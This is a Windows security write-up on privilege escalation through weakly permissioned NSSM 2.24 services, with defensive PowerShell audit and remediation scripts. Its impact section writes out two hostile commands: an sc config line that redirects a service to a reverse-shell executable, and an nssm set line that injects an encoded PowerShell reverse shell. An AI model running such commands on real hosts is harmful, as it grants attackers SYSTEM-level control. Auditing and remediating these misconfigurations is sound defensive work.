NSSM 2.24 Privilege Escalation
The "Non-Sucking Service Manager" (NSSM) version 2.24 appears frequently in security write-ups and lab exercises because it is a textbook example of how a helpful administrative tool can be turned into a vehicle for Local Privilege Escalation (LPE) on Windows. NSSM wraps an ordinary program as a Windows service: the service's image path points at nssm.exe, and nssm.exe in turn launches the configured program under the service account, LOCAL SYSTEM unless the administrator chose otherwise. Whoever can replace nssm.exe, or change what it launches, runs code with that account's privileges.

The Core Vulnerability

- Correct Usage: nssm.exe and the program it wraps live in a directory that only administrators can write to, for example:

nssm install ServiceName "C:\Program Files\My Service\service.exe"

- Improper File Permissions: many applications bundle nssm.exe but fail to secure its directory. If, for example, the Users group has full control (the 'F' flag in icacls output) over the binary or its parent folder, any local user can replace nssm.exe with a malicious executable. The next time the service starts, the Service Control Manager runs the replacement with the service account's privileges, LOCAL SYSTEM by default. The same holds for the wrapped program itself (the Application path NSSM stores for the service): if that file or its folder is writable by Users, swapping it has the same effect, because NSSM launches it under the same account.

Impact and Risk Assessment

A local, low-privileged user who can write to nssm.exe gains code execution as the service account with nothing more than a file copy and a service restart (or a reboot). Where the service's own access control is also weak, the attacker does not even need to touch the file. If the account holds SERVICE_CHANGE_CONFIG on the service, it can redirect the service image directly:

sc config MyNSSMService binPath= "cmd.exe /c C:\temp\reverse_shell.exe"

If it can write the service's Parameters key in the registry, where NSSM keeps its settings, it can instead change what NSSM launches. The example below rewrites the argument string NSSM passes to the wrapped program (the Application value can be changed the same way):

nssm set LegacyApp AppParameters "C:\Windows\System32\cmd.exe /c powershell -enc <base64 reverse shell>"

Both of these commands need rights that a correctly configured service does not grant to ordinary users; the file-replacement path is the one that requires only the NTFS misconfiguration described above. In every case the payload runs as LOCAL SYSTEM if the service was left on the default account, which is a full host compromise and is why this finding is rated high severity.
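The following audit script is an added example and not code from the original article or from the NSSM project. It enumerates every service whose image is nssm.exe, reads the wrapped program's path from the service's Parameters key, and reports ACEs that grant write-class rights to Everyone, Authenticated Users, INTERACTIVE or BUILTIN\Users on nssm.exe, its folder, or the wrapped program. It assumes an elevated PowerShell 5.1 or later session on the host being audited; no service names or paths are assumed, it reports whatever the host has.

```powershell
# Added example, not from the original article: find NSSM-wrapped services whose
# nssm.exe, its directory, or the wrapped program can be modified by low-privileged
# principals. Assumes an elevated PowerShell 5.1+ session on the audited host.

# Well-known SIDs that should never hold write-class rights on a service binary.
# SIDs rather than names so the check works regardless of display language.
$lowPrivSids = @(
    'S-1-1-0',       # Everyone
    'S-1-5-11',      # Authenticated Users
    'S-1-5-4',       # INTERACTIVE
    'S-1-5-32-545'   # BUILTIN\Users
)

# Any of these specific rights lets the holder replace or alter the object or its DACL.
$writeClass = [int][System.Security.AccessControl.FileSystemRights](
    'WriteData, AppendData, Delete, ChangePermissions, TakeOwnership, Modify, FullControl')
# Inherited ACEs often carry generic bits instead; GENERIC_WRITE | GENERIC_ALL.
$genericWriteOrAll = 0x50000000

function Get-WeakAce {
    param([string]$Path)
    # Emits "principal: rights" for every Allow ACE on $Path that grants a
    # low-privileged principal write-class rights. Inherited ACEs are included
    # on purpose: an inherited Users:(F) from the parent folder is the textbook case.
    if (-not (Test-Path -LiteralPath $Path)) { return }
    foreach ($ace in (Get-Acl -LiteralPath $Path).Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try {
            $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value
        } catch { continue }
        if ($lowPrivSids -notcontains $sid) { continue }
        $mask = [int]$ace.FileSystemRights
        if ((($mask -band $writeClass) -ne 0) -or (($mask -band $genericWriteOrAll) -ne 0)) {
            "$($ace.IdentityReference.Value): $($ace.FileSystemRights)"
        }
    }
}

function Get-ServiceBinaryPath {
    param([string]$PathName)
    # Win32_Service.PathName may be quoted and may carry arguments; keep the executable only.
    if ($PathName -match '^\s*"([^"]+)"') { return $Matches[1] }
    return ($PathName.Trim() -split '\s+')[0]
}

function Get-NssmServiceAudit {
    # One record per service whose image is nssm.exe, with every weak ACE found.
    Get-CimInstance -ClassName Win32_Service |
        Where-Object { $_.PathName -match 'nssm\.exe' } |
        ForEach-Object {
            $exe = Get-ServiceBinaryPath $_.PathName
            $dir = Split-Path -Parent $exe
            # NSSM stores the wrapped program's path under the service's Parameters key.
            $params = Get-ItemProperty -LiteralPath "HKLM:\SYSTEM\CurrentControlSet\Services\$($_.Name)\Parameters" -ErrorAction SilentlyContinue
            $app = if ($params) { $params.Application } else { $null }
            $findings = @(Get-WeakAce $exe) + @(Get-WeakAce $dir)
            if ($app) { $findings += @(Get-WeakAce $app) }
            [pscustomobject]@{
                Service     = $_.Name
                RunsAs      = $_.StartName
                NssmExe     = $exe
                Application = $app
                WeakAces    = $findings
                # A writable binary on a LocalSystem service is the full escalation condition.
                Escalatable = ($findings.Count -gt 0) -and ($_.StartName -eq 'LocalSystem')
            }
        }
}

Get-NssmServiceAudit | Format-List
```

A record with Escalatable set to True is the condition the article describes: a low-privileged user can swap the binary and the next restart runs it as SYSTEM. A record with findings but a non-SYSTEM account is still a finding, since the attacker gains that account, but its severity follows the account's privileges.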
Mitigation

- Move the binary to a secure location: place nssm.exe and the program it launches under a directory that only Administrators and SYSTEM can write to, such as Program Files, confirm with icacls that Users has no more than read and execute (RX), and point the service at the protected copy. With sc.exe (the space after "binPath=" and "obj=" is mandatory):

sc config MyNSSMService binPath= "C:\Program Files\SecureApp\app.exe" obj= "NT AUTHORITY\LocalService"

Pointing binPath at app.exe itself only works when app.exe is a native Windows service; in that case NSSM is no longer involved at all. If the program still needs NSSM, binPath stays on the protected copy of nssm.exe and the program path is changed in NSSM's own configuration. Or, if using NSSM directly:

nssm set MyNSSMService Application "C:\Program Files\SecureApp\app.exe"

- Use a Service Account with Least Privilege: configure NSSM services to run as a group managed service account (gMSA), or a built-in low-privilege account such as NT AUTHORITY\LocalService, instead of LOCAL SYSTEM. That way a successful binary swap yields only that account's rights rather than full control of the host.
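The remediation script below is an added example, not code from the original article or from the NSSM project, and carries out both mitigation steps for one service. Every name in it is hypothetical: a service called LegacyApp, nssm.exe and its app.exe currently sitting in a world-writable C:\temp, and C:\Program Files\LegacyApp as the protected destination. It assumes an elevated PowerShell 5.1 or later session and that the wrapped program can run as LocalService.

```powershell
# Added example, not from the original article: remediate one weakly-permissioned
# NSSM-wrapped service. All names are hypothetical (service LegacyApp, binaries in
# C:\temp, destination C:\Program Files\LegacyApp). Run elevated, PowerShell 5.1+.

$svc       = 'LegacyApp'
$oldNssm   = 'C:\temp\nssm.exe'
$oldApp    = 'C:\temp\app.exe'
$secureDir = 'C:\Program Files\LegacyApp'
$nssm      = Join-Path $secureDir 'nssm.exe'
$app       = Join-Path $secureDir 'app.exe'

Stop-Service -Name $svc -Force

# 1. Move the binaries into a directory only administrators can write to.
New-Item -ItemType Directory -Path $secureDir -Force | Out-Null
Copy-Item -LiteralPath $oldNssm -Destination $nssm -Force
Copy-Item -LiteralPath $oldApp  -Destination $app  -Force

# 2. Replace inherited ACEs with an explicit DACL: SYSTEM (S-1-5-18) and
#    Administrators (S-1-5-32-544) get full control, Users (S-1-5-32-545) get
#    read/execute only. SIDs are used so the command is language-independent.
icacls $secureDir /inheritance:r `
    /grant:r '*S-1-5-18:(OI)(CI)F' '*S-1-5-32-544:(OI)(CI)F' '*S-1-5-32-545:(OI)(CI)RX' | Out-Null

# 3. Re-point the service at the protected copy and drop LOCAL SYSTEM for a
#    least-privilege account. sc.exe needs the space after "binPath=" and "obj=";
#    the escaped quotes keep the stored ImagePath quoted, since it contains spaces.
sc.exe config $svc binPath= "\`"$nssm\`"" obj= 'NT AUTHORITY\LocalService' | Out-Null

# 4. Make NSSM launch the program from the protected directory as well.
& $nssm set $svc Application $app
& $nssm set $svc AppDirectory $secureDir

# 5. Remove the writable originals so nothing can fall back to them.
Remove-Item -LiteralPath $oldNssm, $oldApp -Force

# 6. Verify before restarting: account, quoted image path, and a DACL with no
#    write-class entry for Users.
$cfg = Get-CimInstance -ClassName Win32_Service -Filter "Name='$svc'"
'{0} runs as {1} from {2}' -f $cfg.Name, $cfg.StartName, $cfg.PathName
icacls $nssm

Start-Service -Name $svc
```

Running as LocalService means the wrapped program can only read and write what that account is granted, so give it explicit rights on its own data and log directories before switching; a service that worked only because it was SYSTEM will otherwise fail to start. For a domain gMSA the same sc.exe command is used with the account name in obj= and no password.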